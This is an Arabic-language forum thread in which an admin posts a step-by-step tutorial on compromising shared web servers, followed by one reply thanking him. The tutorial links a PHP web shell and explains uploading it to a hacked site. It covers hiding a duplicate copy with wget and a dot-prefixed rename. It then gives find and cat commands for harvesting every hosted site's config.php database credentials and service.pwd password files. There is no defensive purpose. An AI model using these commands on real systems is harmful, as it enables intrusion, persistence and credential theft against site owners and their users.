أحــــــــلام العـــــــــراق
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.
أحــــــــلام العـــــــــراق

منـــــــــــــــتدى عراقي وعربي منــــــــــــــــــــــــــوع ..... معنـــــا تـحلوو المــشـاركـة
 
الرئيسيةالرئيسية  البوابةالبوابة  أحدث الصورأحدث الصور  التسجيلالتسجيل  دخول  
اهلا وسهلا بكم في منتديات احلام العراق اذا لم تكن مسجل الرجاء التسجل مع تحيات منتديات احلامةالعراق وصاحب المنتدى بغدادي وافتخر تحياتي

أحــــــــلام العـــــــــراق  :: التقنية :: Hackers
 

 طريقة اختراق السيرفرات ..

اذهب الى الأسفل 
2 مشترك
كاتب الموضوعرسالة
بغدادي
Admin
Admin
بغدادي


ذكر
عدد الرسائل : 81
العمر : 28
من دعاك الى المنتدى اكتب اسم العضو : اني مصصم المنتدى
الشغل : مصم مواقع و منتديات وخبير في
البلد : العراق بلدي وعايش في
الاوسمة : طريقة اختراق السيرفرات .. Top1
دولتي : طريقة اختراق السيرفرات .. 3dflag12
تاريخ التسجيل : 11/04/2008

طريقة اختراق السيرفرات .. Empty
مُساهمةموضوع: طريقة اختراق السيرفرات ..   طريقة اختراق السيرفرات .. Emptyالأربعاء أبريل 16, 2008 7:38 pm
طريقة اختراق السيرفرات ..
نفترض انك اخترقت موقع باي ثغره.. او عندك انت موقع لك عند اي
سيرفر..
وتبي تخترق السيرفر.. فهذي بسيطه جدا جدا
قم بتحميل سكربت الشيل بلغة php على جهازك
وهذي وصلة الشيل.. (( متطور ))
http://www.proyectotgc.org/*****.zip
----------------------------------------------------------------------
--------
بسم الله نبدأ في الشرح ::--
البي اتش بي شيل ((php***** )) هو سكربت بلغة (( php ))
وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ
مواقع التي على السيرفر وايضا قرائة الملف الــ config
للتي على السيرفر..
ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ php*****
على موقعك او الموقع الذي اخترقته..
ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..
وللتوضيح اكثر..
نفترض انك اخترقت الموقع www.USA.com وقمت بتحميل الــ php*****
على ملف download
فسيصبح العنوان www.USA.com/download/php*****.php
وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها
فراغ
في الفراغ هذا سوف نضع فيه اوامر اللينكس..
ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--
يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..
ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح
يكون معانا واحد مخفي
لاخفاءه نسوي كذا بالطريقة هذي
www.USA.com/download/php*****.php wget
وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv php*****.php
.php*****.php
ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا
ثاني ومخفي بعد..
---------------------------------------------
ندخل الى موضوعنا
والان بعد تحميل الشيل على الموقع
يصبح العنوان مثلا
www.USA.com/download/php*****.php
وثم نجد كتابة اسمها Command وامامها فراغ
في الفراغ هذا ندخل اوامر اللينكس عليه..
وندخل الامر هذا مثلا ls /var/****d
وهو لاحضار جميع المواقع التي على السيرفر..
ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا
اذا لم يكن عليه الــ سيف مود
((safe mode))
=============---==-- شرح الاوامر --==--==============
الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع -
الباسوردات
نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))
1- قواعد البيانات
اكتب هذا الامر امام النص Command في الفراغ المقابل له
اكتب هذا الامر
find / -**** config.php
الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا
:
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admi
n/config.php
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php
(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون
على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300
موقع ))
ونلاحظ ان التي باللون الزهري هي الموقع..
طيب نبي نقرأ الي متكوب داخل الملف هذا
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
ونلاحظ ان الموقع هو www.ainvar.net والمنتدى من نوعية phpBB
المهم نبي نقرأ الي بداخله.. نكتب الامر هذا
cat
/usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php
وثم راح يطلع لك ملف الــ config.php
وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات
روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد
لقاعدة البيانات
او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup
-------------------------------------------------------
الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..
اكتب امام Command في الفراغ نكتب هذا الامر
find / -**** service.pwd
وراح يطلع لنا المواقع بالشكل ذا :
usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.
pwd
usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service
.pwd
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd
التي باللون الزهري هي المواقع...
طيب الان ابي استعرض الباسورد للموقع
usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd
راح نكتب الامر هذا
cat
/usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pw
d
وراح يجينا الباسورد للموقع ومشفر بمقياس DES
----------------------------------------------------------
طيب يوجد طريقة اخرى افضل من ذلك
نكتب الامر هذا
cat /home/*/public_html/_vti_pvt/service.pwd
او
cat /home/*/public_html/_vti_pvt/access.cnf
وراح يجينا الباسوردات لكل المواقع..
ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى
وسوف تجدها ..
او قول لي وانا اعطيك افضلها واغلبها..
وفي النهاية اتمنى انكم استفدتو من الدرس المبسط عن الاختراق عبر
الشيل
.. وشكرا
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://iraqdreamz.yoo7.com
كابتن الرومانسية
Admin
Admin
كابتن الرومانسية


ذكر
عدد الرسائل : 303
العمر : 31
من دعاك الى المنتدى اكتب اسم العضو : مـدير المنـتدى
الشغل : طالب
البلد : العراق
الاوسمة : طريقة اختراق السيرفرات .. 970
تاريخ التسجيل : 09/09/2008

طريقة اختراق السيرفرات .. Empty
مُساهمةموضوع: رد: طريقة اختراق السيرفرات ..   طريقة اختراق السيرفرات .. Emptyالأحد سبتمبر 14, 2008 10:35 am
يسسسسسسسسسسلموووووووووو بغدااااادي ع الموضوع الرااااااائع
مشششكوووووووووور
ننتضرر جديدك
تحياتوووووو
الرجوع الى أعلى الصفحة اذهب الى الأسفل
 
طريقة اختراق السيرفرات ..
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
أحــــــــلام العـــــــــراق  :: التقنية :: Hackers-
انتقل الى: